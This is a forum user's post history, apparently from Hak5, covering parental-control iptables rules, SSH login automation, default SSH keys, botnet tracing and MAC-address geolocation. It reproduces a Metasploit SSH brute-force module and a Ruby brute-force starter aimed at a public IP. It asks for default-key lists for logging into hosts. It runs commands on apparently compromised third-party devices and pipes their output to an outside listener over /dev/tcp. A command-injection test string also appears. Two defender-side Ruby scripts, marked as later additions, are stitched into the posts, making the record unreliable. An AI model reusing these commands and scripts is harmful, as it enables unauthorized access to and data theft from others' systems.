i8igmac

Posts posted by i8igmac

  1. 6 hours ago, PoSHMagiC0de said:

    If you have a raspberry pi you could always use pi-hole.

    https://pi-hole.net/

    Do not know how advanced your router is but if you can setup separate DNS options for reserved clients then you can setup their DNS to point to pi-hole.  Now you can blackhole any DNS requests to sites you do not want them having access to.  Do not know if pi-hole can mac filter requests but I do know it can act as a DHCP server too.  It will give you an insight of all the queries they make too..in essence their sites.  It pretty much black holes any DNS requests for sites you do not want.

    You could go with squid but you will need to tell the clients to use it via proxy settings.  If you are really serious you could put a Snort/Suricata machine in line to do sniffing and filtering which will force them through it.  Adding a cert trusted by the clients will give you insight into their https request contents as well.

    I'm not doubting the idea here, just pointing out the configuration I have explained with the use of a kid-safe wifi access point...

    All devices associated will be affected by the iptables rules without the need to configure proxy settings on each machine or each application...

    You can forward the traffic to pi-hole or squid... the access point running iptables rules is simply a control point...

    Full control of traffic is full control.

  2. 11 hours ago, G-Stress said:

    Thanks for all the info and quick response guys. My babies are (about to be 8) this Wednesday and 9. They're good kids, I don't really worry about them getting curious, at least not yet, but I don't want any accidents either.

    I remember hearing about Squid years ago, but I've never messed with it. We primarily use Chrome, but being that IE would still be an option, I want to really lock things down at the router/AP level. YouTube, I agree there are some things on there not suitable for young kids, but that's the one thing where I trust and allow them to watch appropriate content. So far I've been blessed, the biggest issue there is those compilation videos where some clips are fine then some have a lot of cussing, etc.

    I ran DD-WRT for years, but never played with iptables. I guess now my concern is which would be more reliable/stable and do the best job? If Squid then what would be the best preferred setup via OS to run it on or in a VM? Also does iptables or Squid do any form of reporting via email or txt in the event anyone on that network tried to search for say porn or would I have to manually check logs?

    I will probably be using a Nighthawk router and soon a UniFi AP Pro access point for that network setup.

    If the traffic is controlled at the router then it would take more skill to bypass this filtering...

    An open source router OS that includes iptables really can be powerful.

    The simplest method might simply be to redirect all the kids' traffic to your squid machine.

    http://www.penguintutor.com/kidsafe.php

    http://www.pihomeserver.fr/en/2015/09/01/un-controle-parental-grace-au-raspberry-pi-squid-et-squidguard/

    I like how the squid config looks at this last weblink...

    If you get yourself a proper setup please share the configuration files.

    Installing certificates on the kids' devices also brings the ability to log the traffic.

    • iptables -t nat -A PREROUTING -i eth0 ! -s squid-box -p tcp --dport 80 -j DNAT --to squid-box:3128
    • iptables -t nat -A POSTROUTING -o eth0 -s local-network -d squid-box -j SNAT --to iptables-box
    • iptables -A FORWARD -s local-network -d squid-box -i eth0 -o eth0 -p tcp --dport 3128 -j ACCEPT

     

  3. Get a cheap router from Goodwill. Make sure you check the model number before purchase for DD-WRT compatibility... If it has wireless N or 5.8 GHz speeds then that's a SCORE...

    Flash with new open source firmware, configure the device as a kids wifi repeater...

    Now you can set up custom iptables rules. I'm sure there are already documented iptables configs online for kid safe surfing...

  4. 34 minutes ago, digip said:

    Um. Open a command prompt. Go to the place where "MyStuff" was (the parent directory), and do the following:

     

    
    dir /ahs

    Now, CD into the listed hidden directory. Now do dir again (or add the /ahs if all files are set to the same attributes and hidden)

    This does nothing other than change the file's attributes, to hidden, and system, which can still be seen and accessed. Basically:

    
    ren "poop" "poop2.{21EC2020-3AEA-1069-A2DD-08002B30309D}"
    attrib +h +s "poop2.{21EC2020-3AEA-1069-A2DD-08002B30309D}"
    
    dir /ahs
    
    attrib -h -s "poop2.{21EC2020-3AEA-1069-A2DD-08002B30309D}"
    ren "poop2.{21EC2020-3AEA-1069-A2DD-08002B30309D}" "poop"
    
    dir 

     

    That is not entirely true, there are a few if expressions followed by a proper Echo.

  5. 3 hours ago, digip said:

    I just got one of those blocks, when pasting links from twitter. No code, just linking and quote from a tweet was enough to trigger it.

     

    https://imgur.com/a/YH7eF

     

    here is the post - 

     

    It can be extremely frustrating when you spend 30 minutes writing content then it's all lost once you click submit.

    It can be difficult to copy/paste information and organize it from my Android, I do most of everything from my phone. It happened again last night from my laptop. Extremely frustrating...

    I think it can be triggered when you don't use (code) tags or (quote) tags.

    The captcha seems to be effective enough. Disable the tarded filter.  I doubt code injection will be successful from posting content...

    May sound ironic but if anything this content filtering has made hak5 more vulnerable.

    This could be the downfall of hak5. Fresh content is important. This has prevented me from posting content several times.

  6. I hope to place an if expression before SUCCESS happens.

    if response.data.include?("Please login:")
      # then submit the current CREDS
      scanner.ssh_socket.send_data(creds.user + "\n")
      scanner.ssh_socket.send_data(creds.pass + "\n")
    end

    Here is the modules/auxiliary/scanner/ssh/ssh_login.rb

    ##
    # This module requires Metasploit: https://metasploit.com/download
    # Current source: https://github.com/rapid7/metasploit-framework
    ##
    
    require 'net/ssh'
    require 'net/ssh/command_stream'
    require 'metasploit/framework/login_scanner/ssh'
    require 'metasploit/framework/credential_collection'
    
    class MetasploitModule < Msf::Auxiliary
      include Msf::Auxiliary::AuthBrute
      include Msf::Auxiliary::Report
      include Msf::Auxiliary::CommandShell
    
      include Msf::Auxiliary::Scanner
    
      def initialize
        super(
          'Name'           => 'SSH Login Check Scanner',
          'Description'    => %q{
            This module will test ssh logins on a range of machines and
            report successful logins.  If you have loaded a database plugin
            and connected to a database this module will record successful
            logins and hosts so you can track your access.
          },
          'Author'         => ['todb'],
          'References'     =>
            [
              [ 'CVE', '1999-0502'] # Weak password
            ],
          'License'        => MSF_LICENSE,
          'DefaultOptions' => {'VERBOSE' => false} # Disable annoying connect errors
        )
    
        register_options(
          [
            Opt::RPORT(22)
          ], self.class
        )
    
        register_advanced_options(
          [
            Opt::Proxies,
            OptBool.new('SSH_DEBUG', [ false, 'Enable SSH debugging output (Extreme verbosity!)', false]),
            OptInt.new('SSH_TIMEOUT', [ false, 'Specify the maximum time to negotiate a SSH session', 30])
          ]
        )
    
      end
    
      def rport
        datastore['RPORT']
      end
    
      def session_setup(result, ssh_socket)
        return unless ssh_socket
    
        # Create a new session
        conn = Net::SSH::CommandStream.new(ssh_socket, '/bin/sh', true)
    
        merge_me = {
          'USERPASS_FILE' => nil,
          'USER_FILE'     => nil,
          'PASS_FILE'     => nil,
          'USERNAME'      => result.credential.public,
          'PASSWORD'      => result.credential.private
        }
        info = "#{proto_from_fullname} #{result.credential} (#{@ip}:#{rport})"
        s = start_session(self, info, merge_me, false, conn.lsock)
        self.sockets.delete(ssh_socket.transport.socket)
    
        # Set the session platform
        case result.proof
        when /Linux/
          s.platform = "linux"
        when /Darwin/
          s.platform = "osx"
        when /SunOS/
          s.platform = "solaris"
        when /BSD/
          s.platform = "bsd"
        when /HP-UX/
          s.platform = "hpux"
        when /AIX/
          s.platform = "aix"
        when /Win32|Windows/
          s.platform = "windows"
        when /Unknown command or computer name/
          s.platform = "cisco-ios"
        end
    
        s
      end
    
    
      def run_host(ip)
        @ip = ip
    
        cred_collection = Metasploit::Framework::CredentialCollection.new(
          blank_passwords: datastore['BLANK_PASSWORDS'],
          pass_file: datastore['PASS_FILE'],
          password: datastore['PASSWORD'],
          user_file: datastore['USER_FILE'],
          userpass_file: datastore['USERPASS_FILE'],
          username: datastore['USERNAME'],
          user_as_pass: datastore['USER_AS_PASS'],
        )
    
        cred_collection = prepend_db_passwords(cred_collection)
    
        scanner = Metasploit::Framework::LoginScanner::SSH.new(
          host: ip,
          port: rport,
          cred_details: cred_collection,
          proxies: datastore['Proxies'],
          stop_on_success: datastore['STOP_ON_SUCCESS'],
          bruteforce_speed: datastore['BRUTEFORCE_SPEED'],
          connection_timeout: datastore['SSH_TIMEOUT'],
          framework: framework,
          framework_module: self,
        )
    
        scanner.verbosity = :debug if datastore['SSH_DEBUG']
    
        scanner.scan! do |result|
          credential_data = result.to_h
          credential_data.merge!(
              module_fullname: self.fullname,
              workspace_id: myworkspace_id
          )
          case result.status
          when Metasploit::Model::Login::Status::SUCCESSFUL
            print_brute :level => :good, :ip => ip, :msg => "Success: '#{result.credential}' '#{result.proof.to_s.gsub(/[\r\n\e\b\a]/, ' ')}'"
            credential_core = create_credential(credential_data)
            credential_data[:core] = credential_core
            create_credential_login(credential_data)
            session_setup(result, scanner.ssh_socket)
            :next_user
          when Metasploit::Model::Login::Status::UNABLE_TO_CONNECT
            vprint_brute :level => :verror, :ip => ip, :msg => "Could not connect: #{result.proof}"
            scanner.ssh_socket.close if scanner.ssh_socket && !scanner.ssh_socket.closed?
            invalidate_login(credential_data)
            :abort
          when Metasploit::Model::Login::Status::INCORRECT
            vprint_brute :level => :verror, :ip => ip, :msg => "Failed: '#{result.credential}'"
            invalidate_login(credential_data)
            scanner.ssh_socket.close if scanner.ssh_socket && !scanner.ssh_socket.closed?
          else
            invalidate_login(credential_data)
            scanner.ssh_socket.close if scanner.ssh_socket && !scanner.ssh_socket.closed?
          end
        end
      end
    end

     

  7. Here is an example of logging into a keyboard-interactive login shell.rb

    This is a start of a brute force keyboard-interactive ssh

    require 'net/ssh'
    # 73.9.26.15

    # usage: ruby shell.rb HOST USER PASS
    host, user, pass = ARGV
    abort("usage: #{$PROGRAM_NAME} HOST USER PASS") unless host && user && pass

    host_execution = false   # becomes true once the CLI prompt has been answered

    Net::SSH.start(host, user, password: pass) do |ssh|
      # Open a channel with a pty so the CLI prints its interactive prompts
      channel = ssh.open_channel do |ch, _success|
        ch.request_pty
        ch.exec("help")

        ch.on_data do |c, data|
          print data

          # The CLI asks for the user again even though ssh already passed it
          c.send_data("#{user}\n") if data =~ /login:/i

          # Answer the password prompt ("Password:" or "password :")
          c.send_data("#{pass}\n") if data =~ /password\s*:/i

          # The first time the rkscli prompt appears, send one command;
          # later prompts are only printed (no channel.wait inside a callback,
          # that re-enters the event loop)
          if data.include?('rkscli:') && !host_execution
            host_execution = true
            c.send_data("help\n")
          end
        end
      end

      # Wait for the channel to close
      channel.wait
    end

  8. What ports are used, when a target machine runs the trojan, does it connect back to your machine? If so then you would have configured port forwarding? What port is this?

    You should monitor this port, it's possible random traffic hit your open port but also possible your tool is a backdoor. hackforum is full of bs tools.

    I may have misunderstood what you see. A VNC session? Maybe someone ran your trojan from a VM.

  9. 26 minutes ago, Sebkinne said:

    So our Cloudflare setup blocked your request because it detected a RCE attack. No idea why that would trigger from some links in the post, but I would suggest you try posting them again.

    This is the 3rd time. Previous attempts to post content included some ruby code.

    https://github.com/rapid7/metasploit-framework/blob/master/lib/metasploit/framework/login_scanner/ssh.rb

    Edit. Strange, it works this time. I'll take screenshots next time this happens

    ;.,/'[]{8\=-~=~ `ls` system("uname") }

  10. I'm looking to automate the login process on my router running dropbear. This ssh service is configured in a way that would handle ssh logins with keyboard-interactive authentication.

    If you are unsure what this is, you can test your local machines:

    ssh -o PreferredAuthentications=none -v 192.168.0.1

    Authentications that can continue: publickey,password

    Typically you would see (publickey,password)

    In my situation this information is not displayed and I'm forced to login with an interactive session.

    When you enter an interactive session you would see this below... notice how the user has already been determined by the command used but the session asks for the username

    ssh admin@192.168.69.1

    welcome to Ruckus running dropbear

    Please login: admin

    Password:******

    I hope to use ruby net/ssh or even metasploit to login. So far all my tests to automate the login process have failed... there is some documentation with ruby net/ssh and keyboard-interactive sessions but I can't find any examples online.

  11. 3 hours ago, PoSHMagiC0de said:

    Yep, new installations of distros from ISO generate new keys.  If it is an img that is just copied to a device like a Pi or phone, the keys will be whatever they are in that image unless ssh is not installed, in which case when the ssh server is installed it will generate new keys.

    What about IoT devices? Routers, network storage, ARM devices. It's possible these kinds of devices were flashed with duplicate SSH keys.

    edit;

    Or if a bunch of identical devices were flashed with the same OS, could the MAC address be incorporated in generating the new ssh key or something predictable.

  12. 4 hours ago, PoSHMagiC0de said:

    That pertains to prebuilt images for non-PC devices.  Nethunter and Kali for Raspberry Pi or other ARM devices come as a preinstalled OS image, same goes for the virtual images.  Those will have default keys and you can get them from the images when downloaded.  Anyone that used the ISO to install will have new keys because the package is installed at that moment, hence it generates the keys right there.

    So. I guess I misunderstood...

    During installation, a new key is generated?

    The same goes for routers and other little NAS devices?

  13. I'm looking for a collection of keys I could play around with, does anyone know of a list of default keys for download? Does such a thing exist?

    This metasploit module will attempt to log into a host with a set KEY => kali./ssh/ssh_key

    Just an example, anyone who installs kali could be vulnerable to this type of attack, the key is the same on all kali machines, after kali is installed it is recommended this ssh_key be replaced.

    So is there a list of common default ssh keys anyone has seen for download?
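    A defender-side check for the duplicate-key concern in the posts above, added here as an example and not code from the original posts or from Metasploit: it reads known_hosts style entries, computes OpenSSH-style SHA256 fingerprints and lists any key that more than one host presents. The known_hosts content and the key blobs are constructed placeholders, not real keys.

```ruby
require 'base64'
require 'digest'

# OpenSSH-style fingerprint of a raw public key blob: "SHA256:" followed by
# the unpadded base64 of the SHA-256 digest (the format ssh-keygen -l prints).
def fingerprint(blob)
  'SHA256:' + Base64.strict_encode64(Digest::SHA256.digest(blob)).delete('=')
end

# Parse known_hosts style lines ("host keytype base64blob [comment]").
# Blank lines, comments, hashed (|1|...) entries and bad base64 are skipped.
def parse_known_hosts(text)
  text.each_line.filter_map do |raw|
    line = raw.strip
    next if line.empty? || line.start_with?('#', '|1|')
    host, type, b64 = line.split(/\s+/, 4)
    next unless b64
    { host: host, type: type, fingerprint: fingerprint(Base64.strict_decode64(b64)) }
  rescue ArgumentError
    nil
  end
end

# Group hosts by fingerprint and keep only keys presented by more than one host.
def shared_host_keys(entries)
  entries.group_by { |e| e[:fingerprint] }
         .transform_values { |es| es.map { |e| e[:host] }.uniq.sort }
         .select { |_fp, hosts| hosts.size > 1 }
end

# Constructed sample: three access points flashed from one image share a key,
# the two NAS boxes have their own. The blobs are placeholders, not real keys.
KEY_A = Base64.strict_encode64('constructed-key-blob-A')
KEY_B = Base64.strict_encode64('constructed-key-blob-B')
KEY_C = Base64.strict_encode64('constructed-key-blob-C')
SAMPLE_KNOWN_HOSTS = <<~HOSTS
  # constructed known_hosts for a small lab network
  192.168.1.1 ssh-ed25519 #{KEY_A} ap-1
  192.168.1.2 ssh-ed25519 #{KEY_A} ap-2
  192.168.1.3 ssh-ed25519 #{KEY_A}
  192.168.1.10 ssh-rsa #{KEY_B} nas-1
  192.168.1.11 ssh-rsa #{KEY_C} nas-2
  |1|hashedhost|hashedkey ssh-rsa #{KEY_B}
HOSTS

if __FILE__ == $PROGRAM_NAME
  shared_host_keys(parse_known_hosts(SAMPLE_KNOWN_HOSTS)).each do |fp, hosts|
    puts "#{fp} is presented by #{hosts.join(', ')}"
  end
end
```

    Run it against the output of `ssh-keyscan` for your own subnet to see which boxes never had their image key replaced.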

  14. I found the CnC... all of these devices are connected to the same identical IP...

    It's a VPN service... so I guess all that is left to do is contact the VPN service and submit the logs...

    turdsplash-1090t turdsplash # while true; do nc -l -p 8888 | grep 217.23.5.33; done

    First I started a listener that greps for a specific IP...

    Then I sent 2 commands off to all current sessions

    msf auxiliary(ssh_login) > sessions all -c 'netstat -nt > net'

    msf auxiliary(ssh_login) > sessions all -c 'cat < net > /dev/tcp/turdsplash.ip/8888'

    Then the results pour into my netcat listener

    turdsplash-1090t turdsplash # while true; do nc -l -p 8888 | grep 217.23.5.33; done
    tcp        0      0 192.168.1.130:42074     217.23.5.33:443         ESTABLISHED
    tcp        0      0 192.168.1.130:44592     217.23.5.33:443         CLOSE_WAIT
    tcp        0      0 192.168.10.101:40764    217.23.5.33:443         ESTABLISHED
    tcp        0      0 192.168.10.102:47652    217.23.5.33:443         CLOSE_WAIT
    tcp        0      0 192.168.1.4:55475       217.23.5.33:443         ESTABLISHED
    tcp        0      0 192.168.1.4:39033       217.23.5.33:443         CLOSE_WAIT
    tcp        0      0 192.168.1.103:47597     217.23.5.33:443         ESTABLISHED
    tcp        0      0 192.168.1.103:56610     217.23.5.33:443         CLOSE_WAIT

    I could turn this into a metasploit module or resource script.
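    The netstat triage above, as an added example that is not part of the original post: it parses `netstat -nt` output collected from several hosts, ranks foreign addresses by how many distinct local hosts talk to them (the "same identical IP" pattern), and lists which local hosts hold sessions to the top one. The netstat lines are constructed sample data and 203.0.113.5 is a documentation-range placeholder for the suspect address.

```ruby
# One `netstat -nt` line: proto, queues, local ip:port, foreign ip:port, state.
NETSTAT_LINE = /\A(tcp6?)\s+\d+\s+\d+\s+(\S+):(\d+)\s+(\S+):(\d+)\s+(\S+)/

# Parse netstat output (headers and unrelated lines are ignored) into hashes.
def parse_netstat(text)
  text.each_line.filter_map do |line|
    m = NETSTAT_LINE.match(line)
    next unless m
    { proto: m[1], local_ip: m[2], local_port: m[3].to_i,
      remote_ip: m[4], remote_port: m[5].to_i, state: m[6] }
  end
end

# Crude "is this one of ours" test so LAN and loopback peers do not rank.
def private_ip?(ip)
  ip.start_with?('10.', '192.168.', '127.', '::1') || ip =~ /\A172\.(1[6-9]|2\d|3[01])\./
end

# Rank foreign addresses by how many distinct local hosts talk to them; an
# address reached from every device at once is what stands out here.
def remote_by_host_count(conns)
  conns.reject { |c| private_ip?(c[:remote_ip]) }
       .group_by { |c| c[:remote_ip] }
       .map { |ip, cs| [ip, cs.map { |c| c[:local_ip] }.uniq.size] }
       .sort_by { |ip, n| [-n, ip] }
end

# { local_ip => ["port/STATE", ...] } for every session to the suspect address.
def connections_to(conns, suspect_ip)
  conns.select { |c| c[:remote_ip] == suspect_ip }
       .group_by { |c| c[:local_ip] }
       .transform_values { |cs| cs.map { |c| "#{c[:remote_port]}/#{c[:state]}" } }
end

# Constructed sample as several hosts would send it back over the listener;
# 203.0.113.5 is a placeholder standing in for the suspect address.
SAMPLE_NETSTAT = <<~NETSTAT
  Active Internet connections (w/o servers)
  Proto Recv-Q Send-Q Local Address           Foreign Address         State
  tcp        0      0 192.168.1.130:42074     203.0.113.5:443         ESTABLISHED
  tcp        0      0 192.168.1.130:22        192.168.1.50:51022      ESTABLISHED
  tcp        0      0 192.168.10.101:40764    203.0.113.5:443         CLOSE_WAIT
  tcp        0      0 192.168.1.4:55475       203.0.113.5:443         ESTABLISHED
  tcp6       0      0 ::1:631                 ::1:40001               TIME_WAIT
NETSTAT

if __FILE__ == $PROGRAM_NAME
  conns = parse_netstat(SAMPLE_NETSTAT)
  suspect, count = remote_by_host_count(conns).first
  puts "#{suspect} is reached from #{count} local hosts:"
  connections_to(conns, suspect).each { |ip, s| puts "  #{ip} #{s.join(' ')}" }
end
```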

  15. On 8/5/2017 at 7:03 AM, Spoonish said:

    Roy is here to save the day!♪♫

    You could help in providing mind bottling theories to solving this question... how do you get shells...

    The honey pot was fun but here were the next steps I took in exploring this botnet that is attacking my Super-L33t-wifi-router

    There have been questions around here about setting up metasploit modules and configuring your exploits to set your reverse meterpreter with a public IP... I have answered in this video.

    If anyone wants a demonstration on the steps I took in setting up the honey pot and iptables used to redirect and monitor traffic, I could make a video.

  16. 17 minutes ago, Just_a_User said:

    Wasn't that something Samy Kamkar did but Google borked it. He says it's still possible for the motivated reader.

    "I then take the MAC address and send it along to Google Location Services. This is an HTTP-based service where router MAC addresses are mapped to approximate GPS "

    http://www.samy.pl/mapxss/

    This looks interesting. I was thinking client MAC addresses is what I may be looking for.

  17. Google used to drive around and log MAC addresses of access points and log GPS location until this raised privacy concerns.

    So what they did after this was use smart phones to collect this data in the same manner but with the proper terms and conditions accepted by the user.

    One of my habits is watching traffic on my network. I have seen my old Samsung S5 sending MAC address with GPS x,y locations in plain text. This was a running service that sparked my interest.

    This information can be used to locate a laptop, tablet, cell phone or anything with a MAC address.

    If millions of smart phone users have been collecting this data and building Google's database, it should be no problem to search for a MAC address and retrieve a GPS location.

    Here is an example of a MAC address and GPS logger/tracker. https://cellphonetrackers.org/gsm/wifi-tracker.php

    Here is a Google API https://developers.google.com/maps/documentation/geolocation/intro

    Anyone know if Google has given public access to this database?